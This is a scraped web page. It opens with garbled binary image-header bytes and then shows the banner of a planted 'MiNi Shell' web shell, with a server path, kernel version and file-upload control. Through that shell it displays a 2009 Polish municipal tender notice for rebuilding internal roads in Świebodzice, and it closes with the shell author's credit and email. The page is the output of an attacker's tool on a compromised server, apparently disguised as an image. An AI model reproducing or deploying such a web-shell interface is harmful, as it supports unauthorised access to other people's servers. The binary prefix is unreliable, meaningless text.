JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090305/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090305/51668-N-2009.html

<p class="kh_header"><b>Świebodzice: REMONT I PRZEBUDOWA DRÓG NA OSIEDLU PIASTOWSKIM - DROGI WEWNĘTRZNE</b><br>
<b>Numer ogłoszenia: 51668 - 2009; data zamieszczenia: 05.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Świebodzice , ul. Rynek 1, 58-160 Świebodzice, woj. dolnośląskie, tel. 074 6669543, faks 074 6669509.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swiebodzice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT I PRZEBUDOWA DRÓG NA OSIEDLU PIASTOWSKIM - DROGI WEWNĘTRZNE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> .Zakres przedmiotu zamówienia obejmuje przebudowę następujących dróg
 
Część I  - ul. K. Odnowiciela
Część II - ul. Księcia Bolka
Część III - ul. Mieszka Starego
Część IV - H. Pobożnego
Wykonanie każdej części zamówienia obejmuje następujące elementy i konieczny do wykonania  niżej wymieniony zakres prac:
a).Rozebranie istniejącej konstrukcji jezdni , parkingów i chodników
b).Przestawienie istniejących wpustów deszczowych
c).Montaż nowych wpustów deszczowych wraz z przykanalikami
d).Wykonanie sieci kanalizacji deszczowej
e).Montaż studni rewizyjnych
f).Montaż rur ochronnych na sieci uzbrojenia terenu
g).Przestawienie słupów oświetlenia ulicznego wraz z wymianą zniszczonych opraw oświetleniowych i wykonaniem nowej powłoki malarskiej
h).Wykonanie nowej konstrukcji jezdni wraz z nową nawierzchnią
i).Wykonanie nowej konstrukcji parkingów wraz z nową nawierzchnią
j).Wykonanie nowej konstrukcji chodników wraz z nową nawierzchnią
Szczegółowy zakres przedmiotu zamówienia zawarty jest  w dokumentacji projektowej, opisach zakresów robót, specyfikacji technicznej wykonania i odbioru robót oraz przedmiarze robót.
ZALECA SIĘ ZAINTERESOWANYM WYKONAWCOM DOKONANIE WIZJI LOKALNEJ MIEJSCA WYKONYWANIA ROBÓT PRZED ZŁOŻENIEM OFERTY..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.21.30-1, 45.22.33.00-9, 45.31.60.00-5, 45.11.10.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 20.04.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawców wniesienia  wadium odpowiednio dla każdej części zamówienia na którą składają ofertę w wysokości jak niżej:

Część I  - ul. K. Odnowiciela   -   wadium 15 000 zł
Część II - ul. Księcia Bolka     -   wadium 15 000 zł 
Część III - ul. Mieszka Starego-   wadium 10 000 zł
Część IV - H. Pobożnego         -   wadium 10 000 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunki udziału w postępowaniu i opis sposobu oceny ich spełnienia:
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają niżej podane warunki:

5.1. Nie podlegają wykluczeniu na podstawie art. 24 ustawy Prawo zamówień publicznych;
5.2. Posiadają niezbędną wiedzę i doświadczenie oraz uprawnienia niezbędne do wykonania zamówienia w następujących specjalnościach:
- specjalność drogowa
- specjalność instalacyjna w zakresie sieci instalacji wodociągowych i kanalizacyjnych
- specjalność instalacyjna w zakresie sieci , instalacji i urządzeń  elektrycznych i elektroenergetycznych
5.3.Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie  zamówienia.
5.4. W/w warunki zostaną uznane za spełnione, jeżeli Wykonawca złoży kompletne dokumenty, o których mowa w punkcie 6 niniejszej specyfikacji..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 6.Oświadczenia i dokumenty, jakie muszą dostarczyć Wykonawcy w celu          potwierdzenia spełniania warunków udziału w postępowaniu:

6.1.Dokumentami potwierdzającymi spełnianie warunku, o którym mowa w punkcie  5.1. niniejszej specyfikacji muszą być:                                    

a) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do  rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesiący przed upływem terminu  składania ofert..

b) Aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu  składania ofert.

c) Złożona oferta zgodna z załączonym wzorem oferta zał.Nr 1 do niniejszej SIWZ i podpisana przez uprawnionych do składania oświadczeń woli w imieniu Wykonawcy .

6.2. Dokumentami potwierdzającymi spełnianie warunku, o którym mowa w punkcie 5.2. niniejszej  specyfikacji muszą być: 
a) Wykaz osób, które będą odpowiedzialne za realizację zamówienia o specjalnościach wymienionych w punkcie 5.2. wraz z uprawnieniami budowlanymi dla w/w osób, określonymi przepisami Prawa budowlanego - zał. Nr 2 do SIWZ .

b) Zaświadczenie z właściwej Izby Samorządu Zawodowego dla w/w osób, potwierdzające ich przynależność do Izby oraz posiadanie wymaganego ubezpieczenia od odpowiedzialności cywilnej, aktualnego na dzień składania ofert. Zamawiający dopuszcza, jako dokument równoważny, złożenie nieaktualnego zaświadczenia z w/w Izby oraz dowodu dokonania należnych składek, z którego wynika, że są one opłacone na dzień składania ofert.

c) Sporządzony przez Wykonawcę wykaz zrealizowanych zamówień zał. Nr 3 do SIWZ wykonanych w okresie  ostatnich  pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających rodzajowi robót niniejszego zamówienia i (minimum trzy zadania , budowa i remonty dróg o nawierzchni ścieralnej w technologii jak w projekcie) i cenach brutto nie mniejszych każde od ceny brutto składanej oferty. Wykaz musi zawierać:  nazwę zadania , jego  cenę brutto, datę rozpoczęcia i odbioru , nazwę i adres  Inwestora.

d) Dokumenty potwierdzające, że zamówienia  określone w wykazie zostały wykonane należycie, np. referencje ,zaświadczenia

6.3. Dokumentami potwierdzającymi spełnianie warunku, o którym mowa w punkcie 5.3. niniejszej  specyfikacji muszą być: 
a) Zaświadczenie lub informacja z banku potwierdzająca, że Wykonawca posiada zdolność kredytową minimum do wysokości ceny brutto składanej oferty a w przypadku oferty na kilka części minimum do wysokości sumy cen brutto ofert na te części  wystawionego nie wcześniej niż trzy miesiące przed datą składania ofert. 

b) Oświadczenie  zał. Nr 5 do SIWZ , że wobec  Wykonawcy nie jest prowadzone na dzień składania ofert  sądowe postępowanie egzekucyjne.

c) Dokument potwierdzający ubezpieczenie Wykonawcy od odpowiedzialności cywilnej w zakresie prowadzonej działalności na wartość nie mniejszą  niż cena  brutto składanej oferty z terminem ważności nie krótszym niż umowny termin zakończenia zadania.

6.4.Zbiorcze zestawienie - wszystkich wymaganych przez Zamawiającego dokumentów

l.p.	Nazwa (rodzaj) dokumentu
1	Formularz oferty z kosztorysem ofertowym - zał. Nr 1 do SIWZ
2	Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
3	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że dostawca lub wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
4	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (członkowie zarządu, prokurenci lub właściciele w przypadku podmiotów prowadzących działalność gospodarczą na podstawie wpisu do ewidencji działalności gospodarczej)
5	Wykaz osób i dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (w szczególności zaświadczenie o przynależności do Izby Inżynierów Budownictwa ) zał. Nr. 2 do SIWZ
6	Sporządzony przez Wykonawcę wykaz zrealizowanych zamówień zał. Nr 3 do SIWZ wykonanych w okresie  ostatnich  pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających rodzajowi robót niniejszego zamówienia i (minimum trzy zadania , budowa i remonty dróg o nawierzchni ścieralnej w technologii jak w projekcie) i cenach brutto nie mniejszych każde od ceny brutto składanej oferty. Wykaz musi zawierać:  nazwę zadania , jego  cenę brutto, datę rozpoczęcia i odbioru , nazwę i adres  Inwestora.
7	Wykaz podwykonawców firm i podmiotów uczestniczących w realizacji zamówienia zał. Nr.4 do SIWZ
8	Oświadczenie  zał. Nr 5 do SIWZ , że wobec  Wykonawcy na dzień składania ofert nie jest prowadzone sądowe postępowanie egzekucyjne.
9	Zaświadczenie lub informacja z banku potwierdzająca, że Wykonawca posiada zdolność kredytową minimum do wysokości ceny brutto składanej oferty a w przypadku oferty na kilka części minimum do wysokości sumy cen brutto ofert na te części  wystawionego nie wcześniej niż trzy miesiące przed datą składania ofert. 

10	Polisa a w przypadku jej braku inny dokument potwierdzający ubezpieczenie Wykonawcy od odpowiedzialności cywilnej w zakresie prowadzonej działalności na wartość nie mniejszą  niż cena  brutto składanej oferty z  terminem ważności nie krótszym niż umowny termin zakończenia zadania.
11	Umowa regulująca współpracę podmiotów występujących wspólnie oraz pełnomocnictwo dla reprezentanta z określeniem zakresu pełnomocnictwa - jeżeli taka sytuacja występuje
12	Podpisany wzór umowy - zał. Nr 6 do SIWZ

1).Wszystkie w/w dokumenty winny być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez  uprawnionych do składania oświadczeń woli w imieniu Wykonawcy.

2).Upoważnienie osób podpisujących ofertę do jej podpisania musi bezpośrednio wynikać z dokumentów dołączonych do oferty. Oznacza to, że jeżeli upoważnienie takie nie wynika wprost z dokumentu stwierdzającego status prawny Wykonawcy (odpisu z właściwego rejestru lub zaświadczenia o wpisie do ewidencji działalności gospodarczej), to do oferty należy dołączyć stosowne pełnomocnictwo. 

3).Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.

4).W przypadku składania oferty wspólnej przez kilku przedsiębiorców, każdy ze wspólników musi złożyć dokumenty wymienione w tabeli p.2, 3, 4  a pozostałe dokumenty będą traktowane jako wspólne. Wspólnicy muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy. Do oferty należy dołączyć stosowne pełnomocnictwo, podpisane przez osoby upoważnione do składania oświadczeń woli każdego ze wspólników.
Wspólnicy ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia, określoną w art. 366 Kodeksu cywilnego. 
          
        6.5. Wykonawca z siedzibą poza terytorium Polski
                                                                          
a). zamiast dokumentów, o których mowa w punktach 2, 3, 4,  tabeli składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę, lub miejsce zamieszkania, potwierdzające odpowiednio, że:
- nie otwarto jego likwidacji ani nie ogłoszono upadłości,
- nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne, albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
- nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
b). zamiast dokumentów, o których mowa w punkcie 4 tabeli składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w punktach 2,3,4,  tabeli, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 0.9</li>
<li>2 - Czas realizacji - 0.1</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.swiebodzice.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD MIASTA 
RYNEK 1
58-160 ŚWIEBODZICE.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.03.2009 godzina 10:00, miejsce: URZĄD MIASTA 
RYNEK 1
58-160 ŚWIEBODZICE
 (sekretariat pok. Nr 10).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> REMONT I PRZEBUDOWA DRÓG NA OSIEDLU PIASTOWSKIM - DROGI WEWNĘTRZNE 

Część I  - ul. K. Odnowiciela.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie każdej części zamówienia obejmuje następujące elementy i konieczny do wykonania  niżej wymieniony zakres prac:
a).Rozebranie istniejącej konstrukcji jezdni , parkingów i chodników
b).Przestawienie istniejących wpustów deszczowych
c).Montaż nowych wpustów deszczowych wraz z przykanalikami
d).Wykonanie sieci kanalizacji deszczowej
e).Montaż studni rewizyjnych
f).Montaż rur ochronnych na sieci uzbrojenia terenu
g).Przestawienie słupów oświetlenia ulicznego wraz z wymianą zniszczonych opraw oświetleniowych i wykonaniem nowej powłoki malarskiej
h).Wykonanie nowej konstrukcji jezdni wraz z nową nawierzchnią
i).Wykonanie nowej konstrukcji parkingów wraz z nową nawierzchnią
j).Wykonanie nowej konstrukcji chodników wraz z nową nawierzchnią
Szczegółowy zakres przedmiotu zamówienia zawarty jest  w dokumentacji projektowej, opisach zakresów robót, specyfikacji technicznej wykonania i odbioru robót oraz przedmiarze robót.
ZALECA SIĘ ZAINTERESOWANYM WYKONAWCOM DOKONANIE WIZJI LOKALNEJ MIEJSCA WYKONYWANIA ROBÓT PRZED ZŁOŻENIEM OFERTY..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.21.30-1, 45.22.33.00-9, 45.31.60.00-5, 45.11.10.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 20.04.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.9</li>
<li>2. Czas realizacji - 0.1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> REMONT I PRZEBUDOWA DRÓG NA OSIEDLU PIASTOWSKIM - DROGI WEWNĘTRZNE 
Część II - ul. Księcia Bolka.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie każdej części zamówienia obejmuje następujące elementy i konieczny do wykonania  niżej wymieniony zakres prac:
a).Rozebranie istniejącej konstrukcji jezdni , parkingów i chodników
b).Przestawienie istniejących wpustów deszczowych
c).Montaż nowych wpustów deszczowych wraz z przykanalikami
d).Wykonanie sieci kanalizacji deszczowej
e).Montaż studni rewizyjnych
f).Montaż rur ochronnych na sieci uzbrojenia terenu
g).Przestawienie słupów oświetlenia ulicznego wraz z wymianą zniszczonych opraw oświetleniowych i wykonaniem nowej powłoki malarskiej
h).Wykonanie nowej konstrukcji jezdni wraz z nową nawierzchnią
i).Wykonanie nowej konstrukcji parkingów wraz z nową nawierzchnią
j).Wykonanie nowej konstrukcji chodników wraz z nową nawierzchnią
Szczegółowy zakres przedmiotu zamówienia zawarty jest  w dokumentacji projektowej, opisach zakresów robót, specyfikacji technicznej wykonania i odbioru robót oraz przedmiarze robót.
ZALECA SIĘ ZAINTERESOWANYM WYKONAWCOM DOKONANIE WIZJI LOKALNEJ MIEJSCA WYKONYWANIA ROBÓT PRZED ZŁOŻENIEM OFERTY..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.21.30-1, 45.22.33.00-9, 45.31.60.00-5, 45.11.10.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 08.06.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.9</li>
<li>2. Czas realizacji - 0.1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> REMONT I PRZEBUDOWA DRÓG NA OSIEDLU PIASTOWSKIM - DROGI WEWNĘTRZNE 
Część III - ul. Mieszka Starego.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie każdej części zamówienia obejmuje następujące elementy i konieczny do wykonania  niżej wymieniony zakres prac:
a).Rozebranie istniejącej konstrukcji jezdni , parkingów i chodników
b).Przestawienie istniejących wpustów deszczowych
c).Montaż nowych wpustów deszczowych wraz z przykanalikami
d).Wykonanie sieci kanalizacji deszczowej
e).Montaż studni rewizyjnych
f).Montaż rur ochronnych na sieci uzbrojenia terenu
g).Przestawienie słupów oświetlenia ulicznego wraz z wymianą zniszczonych opraw oświetleniowych i wykonaniem nowej powłoki malarskiej
h).Wykonanie nowej konstrukcji jezdni wraz z nową nawierzchnią
i).Wykonanie nowej konstrukcji parkingów wraz z nową nawierzchnią
j).Wykonanie nowej konstrukcji chodników wraz z nową nawierzchnią
Szczegółowy zakres przedmiotu zamówienia zawarty jest  w dokumentacji projektowej, opisach zakresów robót, specyfikacji technicznej wykonania i odbioru robót oraz przedmiarze robót.
ZALECA SIĘ ZAINTERESOWANYM WYKONAWCOM DOKONANIE WIZJI LOKALNEJ MIEJSCA WYKONYWANIA ROBÓT PRZED ZŁOŻENIEM OFERTY..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.21.30-1, 45.22.33.00-9, 45.31.60.00-5, 45.11.10.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 20.07.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.9</li>
<li>2. Czas realizacji - 0.1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> REMONT I PRZEBUDOWA DRÓG NA OSIEDLU PI
ASTOWSKIM - DROGI WEWNĘTRZNE 
Część IV - H. Pobożnego.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie każdej części zamówienia obejmuje następujące elementy i konieczny do wykonania  niżej wymieniony zakres prac:
a).Rozebranie istniejącej konstrukcji jezdni , parkingów i chodników
b).Przestawienie istniejących wpustów deszczowych
c).Montaż nowych wpustów deszczowych wraz z przykanalikami
d).Wykonanie sieci kanalizacji deszczowej
e).Montaż studni rewizyjnych
f).Montaż rur ochronnych na sieci uzbrojenia terenu
g).Przestawienie słupów oświetlenia ulicznego wraz z wymianą zniszczonych opraw oświetleniowych i wykonaniem nowej powłoki malarskiej
h).Wykonanie nowej konstrukcji jezdni wraz z nową nawierzchnią
i).Wykonanie nowej konstrukcji parkingów wraz z nową nawierzchnią
j).Wykonanie nowej konstrukcji chodników wraz z nową nawierzchnią
Szczegółowy zakres przedmiotu zamówienia zawarty jest  w dokumentacji projektowej, opisach zakresów robót, specyfikacji technicznej wykonania i odbioru robót oraz przedmiarze robót.
ZALECA SIĘ ZAINTERESOWANYM WYKONAWCOM DOKONANIE WIZJI LOKALNEJ MIEJSCA WYKONYWANIA ROBÓT PRZED ZŁOŻENIEM OFERTY..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.21.30-1, 45.22.33.00-9, 45.31.60.00-5, 45.11.10.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 14.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.9</li>
<li>2. Czas realizacji - 0.1</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com